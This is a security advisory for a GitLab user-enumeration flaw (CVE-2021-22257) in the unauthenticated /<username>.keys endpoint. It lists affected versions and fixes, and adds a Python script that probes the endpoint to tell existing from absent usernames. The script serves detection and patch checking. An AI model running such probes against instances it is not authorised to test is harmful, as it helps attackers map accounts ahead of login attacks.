PT-2021-14919 · Gitlab · Gitlab

Published

2021-10-05

·

Updated

2024-03-06

·

CVE-2021-22257

CVSS v3.1

5.3

Medium

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions: GitLab versions 14.0 through 14.0.8; GitLab versions 14.1 through 14.1.3; GitLab versions 14.2 through 14.2.1
Description: An issue has been discovered in GitLab where the "/user.keys" route (the unauthenticated "/<username>.keys" endpoint that serves a user's public SSH keys) is not restricted on instances with public visibility disabled. Because the endpoint answers differently for existing and non-existing accounts, an unauthenticated attacker can confirm which usernames exist, allowing user enumeration on such instances.
Recommendations: For versions 14.0 through 14.0.8, update to version 14.0.9 or later. For versions 14.1 through 14.1.3, update to version 14.1.4 or later. For versions 14.2 through 14.2.1, update to version 14.2.2 or later. If updating immediately is not possible, restrict unauthenticated access to the "/<username>.keys" endpoint (for example at the reverse proxy in front of GitLab) as a temporary workaround until the update is applied.
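The following check is an added example, not part of this advisory and not GitLab's own code. It probes "/<username>.keys" once for an account known to exist and several times for random usernames that almost certainly do not, and reports whether the route answers the two cases differently, which is exactly the oracle the description above relies on. The response behaviour encoded in the constructed fake fetchers (200 with key material for an existing user, 404 for an absent one, a redirect once the route is restricted) is an assumption for illustration, as are the base URL and usernames; the verdict is only meaningful on an instance where public visibility is disabled, since on a public instance the route is reachable by design.

```python
"""Probe a GitLab instance for the /<username>.keys username oracle.

Added example; not GitLab code. Status-code semantics below are assumptions.
"""
import re
import secrets
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# A fetcher maps a URL to (HTTP status, body text). Injectable so the check
# can run offline against constructed responses.
Fetcher = Callable[[str], Tuple[int, str]]

# Only probe plausible usernames so nothing odd ends up in the request path.
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,254}$")


def keys_url(base_url: str, username: str) -> str:
    """Build the /<username>.keys URL for a candidate username."""
    if not USERNAME_RE.match(username):
        raise ValueError(f"refusing to probe malformed username: {username!r}")
    return f"{base_url.rstrip('/')}/{username}.keys"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Do not follow redirects: a redirect to the sign-in page is itself the
    # signal that the route is restricted, and following it would hide that.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def urllib_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Live fetcher: returns (status, body) and reports HTTP errors as values."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def response_class(status: int, body: str) -> str:
    """Collapse a response into the feature an attacker would key on."""
    if 300 <= status < 400:
        return "redirect"
    if status == 200:
        # Assumption: an existing account with no keys still answers 200 with
        # an empty body, so either form of 200 confirms the account exists.
        has_key = any(tag in body for tag in ("ssh-", "ecdsa-", "sk-"))
        return "keys" if has_key else "empty-200"
    return f"status-{status}"


def check_enumeration(base_url: str, known_user: str,
                      fetch: Fetcher = urllib_fetch, rounds: int = 3) -> Dict[str, object]:
    """Compare a known account against random, almost certainly absent, usernames.

    The route acts as a username oracle when the known account's response class
    differs from every random probe's. Returns the observed classes and verdict.
    """
    known_class = response_class(*fetch(keys_url(base_url, known_user)))
    absent_classes: List[str] = []
    for _ in range(rounds):
        candidate = "nx-" + secrets.token_hex(8)  # letter-led, 19 chars, matches USERNAME_RE
        absent_classes.append(response_class(*fetch(keys_url(base_url, candidate))))
    enumerable = all(cls != known_class for cls in absent_classes)
    return {"known": known_class, "absent": absent_classes, "enumerable": enumerable}


if __name__ == "__main__":
    # Placeholder target; replace with your own instance and a real account name.
    print(check_enumeration("https://gitlab.example.invalid", "root"))
```

Run it with a username you know exists (the admin account is a safe choice) against an instance whose "Restricted visibility levels" setting includes Public; a verdict of enumerable means the route still distinguishes present from absent accounts for unauthenticated callers.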


Related Identifiers

BIT-GITLAB-2021-22257
CVE-2021-22257

Affected Products

Gitlab